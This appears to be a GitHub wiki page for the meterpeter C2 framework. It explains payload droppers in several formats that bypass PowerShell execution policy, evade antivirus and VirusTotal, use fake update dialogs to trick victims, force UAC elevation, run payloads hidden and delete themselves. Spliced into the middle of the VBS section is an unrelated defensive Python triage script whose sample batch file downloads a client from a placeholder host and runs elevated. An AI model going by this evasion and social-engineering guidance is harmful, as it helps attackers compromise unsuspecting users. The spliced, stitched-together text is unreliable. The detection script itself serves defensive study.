
working with meterpeter payload droppers

pedro ubuntu edited this page Jan 31, 2022 · 161 revisions



:octocat: Description

meterpeter C2 auto-creates client (payload) droppers in three different file formats (BAT | HTA | EXE). All droppers can auto-change the PowerShell ExecutionPolicy to 'Unrestricted' so that PS1 scripts run silently, and all droppers also spawn a message box (dialog box) or use another social-engineering technique to better trick the target user into executing our payload.

Why use dropper(s) instead of using the actual payload file?

  • The dropper does not contain any malicious code that can be easily flagged by AV
  • The dropper performs a PS execution policy bypass before downloading\executing the real payload
  • The dropper performs manual UAC elevation (UAC dialog box) before downloading\executing the real payload
  • The dropper downloads\executes our payload in a background process detached from the parent process (hidden)
  • The dropper can be safely deleted after execution, because our payload is running in a different process (orphan)
  • People normally scan payloads on VirusTotal (or similar websites); this way they are scanning the dropper source code (not malicious) and leave the payload source code alone ;) ..

:octocat: Remark

  • $Env:TMP is the client (payload) default working directory (remote host)
  • Update-KB5005101.bat & Update-KB5005101.exe allow droppers to spawn UAC dialog box(es) to run elevated.
  • LanManServer 'running' on target is a mandatory requirement to trigger UAC elevation on Update-KB5005101.bat

:octocat: KB5005101.bat

Id: 1
Dropper file name: Update-KB5005101.bat
Format: BAT
Detection: Undetected
Execution: PS ExecutionPolicy bypass + Social Engineering (Get-HotFix). Spawns a minimized cmd prompt for a few seconds while downloading\executing the client in a background process.

Manually edit Update-KB5005101.bat and delete the following lines for faster batch execution:

[screenshot: lines to delete from Update-KB5005101.bat]

The service LanManServer 'running' on target is a mandatory requirement to trigger UAC elevation on Update-KB5005101.bat. If UAC elevation is selected on the batch file and the service is stopped, the dropper enters an infinite loop (not good). To prevent that, a new function was added to the batch dropper that checks the LanManServer service state before spawning the UAC dialog box. If the service is stopped on the target machine, the dropper is executed under the 'UserLand' privilege token.

[screenshot: LanManServer service-state check]

The second line in the batch file makes the cmd prompt start in the 'minimized' state ..

[screenshot: dropper]


:octocat: KB5005101.hta

Id: 2
Dropper file name: Update-KB5005101.hta
Format: HTA
Detection: Undetected
Execution: PS ExecutionPolicy bypass + Social Engineering msgbox. Downloads\executes the client in a background process.

Manually edit Update.hta and delete the following lines to suppress msgbox displays:

[screenshot: msgbox lines to delete from Update.hta]

Manually edit Update.hta and delete the following line to suppress auto-set-powershell-execution-policy-to-unrestricted:

[screenshot: execution-policy line to delete from Update.hta]

  • Remark: some meterpeter modules might malfunction in displaying module stdout when using HTA droppers ..


:octocat: KB5005101.exe

Id: 3
Dropper file name: Update-KB5005101.exe
Format: EXE
Detection: Suspicious
Execution: uac (admin) \ nouac (user) + Social Engineering msgbox. Downloads\executes the client in a background process.

Manually edit update.ps1 and change the following value to suppress dropper msgbox displays:

[screenshot: msgbox value to change in update.ps1]

Manually edit update.ps1 and delete the following cmdline to suppress auto-set-powershell-execution-policy-to-unrestricted:

[screenshot: execution-policy cmdline to delete from update.ps1]


:octocat: KB5005101.vbs

Id: 4
Dropper file name: Update-KB5005101.vbs
Format: VBS
Detection: Undetected
Execution: PS ExecutionPolicy bypass + Social Engineering msgbox + UAC elevation dialog box + vbscript auto-delete at the end + downloads\executes the client in a background process.

The selected function checks whether the current process (shell) is running under administrator privileges...

  • If not, it spawns a UAC dialog box to be able to run in an elevated context (administrator privileges)
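Added example, not part of this wiki or of the meterpeter project: a defender-side triage script that flags the dropper traits described in the Description section and in this VBS section (execution-policy change, hidden background download-and-execute, manual UAC elevation via "runas", the LanManServer service check, script self-deletion, and the $Env:TMP working directory). The indicator names, the regular expressions, the scoring rule and the two sample scripts are all constructed for this example; `example.invalid` is a placeholder host, not a real C2 address.

```python
"""Heuristic triage of script-based payload droppers (constructed example)."""
import re
from dataclasses import dataclass, field

# Indicators distilled from the dropper behaviours described on this page.
# Pattern names and regexes are assumptions made for this example, not a
# signature set shipped by any product.
INDICATORS = {
    "execpolicy_tamper": r"set-executionpolicy\s+(unrestricted|bypass)|executionpolicy\s+bypass",
    "hidden_window":     r"-w(indowstyle)?\s+hidden|\.run\s*\(.*,\s*0\b",
    "download_exec":     r"invoke-webrequest|downloadstring|downloadfile|\biwr\b|\bwget\b",
    "uac_elevation":     r"shellexecute.*runas|start-process\s.*-verb\s+runas",
    "service_probe":     r"\blanmanserver\b",
    "self_delete":       r"del\s+[\"']?%~f0|deletefile.*scriptfullname",
    "tmp_workdir":       r"%tmp%|\$env:tmp",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in INDICATORS.items()}


@dataclass
class Finding:
    indicator: str
    line_no: int
    text: str


@dataclass
class TriageResult:
    findings: list = field(default_factory=list)

    @property
    def indicators(self) -> list:
        """Distinct indicator names that fired, sorted for stable output."""
        return sorted({f.indicator for f in self.findings})

    @property
    def suspicious(self) -> bool:
        # Policy tampering or a UAC prompt alone is common in admin scripts;
        # a download-and-execute combined with two or more other traits is
        # the dropper shape this page describes.
        hits = set(self.indicators)
        return "download_exec" in hits and len(hits) >= 3


def triage_script(text: str) -> TriageResult:
    """Scan a .bat/.hta/.vbs/.ps1 body line by line and record every hit."""
    result = TriageResult()
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, rx in COMPILED.items():
            if rx.search(line):
                result.findings.append(Finding(name, line_no, line.strip()))
    return result


# Constructed sample inputs (not taken from the project) for a local dry run.
SUSPICIOUS_SAMPLE = """\
@echo off
powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser -Force"
sc query LanManServer | find "RUNNING"
powershell -WindowStyle Hidden -Command "Invoke-WebRequest http://example.invalid/client.ps1 -OutFile $Env:TMP\\client.ps1"
powershell -Command "Start-Process cmd -Verb RunAs"
del "%~f0"
"""

BENIGN_SAMPLE = """\
@echo off
echo Installing update...
powershell -Command "Get-HotFix | Select-Object -First 5"
"""


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        r = triage_script(sample)
        print(f"{label}: suspicious={r.suspicious} indicators={r.indicators}")
        for f in r.findings:
            print(f"  line {f.line_no} [{f.indicator}] {f.text}")
```

The rule in `suspicious` is deliberately conservative: a legitimate installer may set an execution policy or ask for elevation, so only the combination of a download-and-execute with other dropper traits is flagged, and every matched line is kept so an analyst can confirm the verdict by hand.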

[screenshot: runas elevation check]

Final Notes:

[screenshot: exec]


:octocat: Easter Egg - Program.cs(EXE) 'FileLess' Payload Dropper

Id: Not Available
Dropper file name: User Input
Format: EXE
Detection: Undetected
Execution: FileLess exec of client.ps1 in RAM (does not touch disk)

The following Program.cs (not implemented in @Meterpeter yet) can be manually compiled to a standalone executable that downloads\executes our client.ps1 in RAM (fileless). For that, just change the 'Program.StartInfo.Arguments()' API to point to our client.ps1, then download the CsOnTheFly.ps1 cmdlet to compile Program.cs into a standalone executable.

[screenshot: CsOnTheFly]

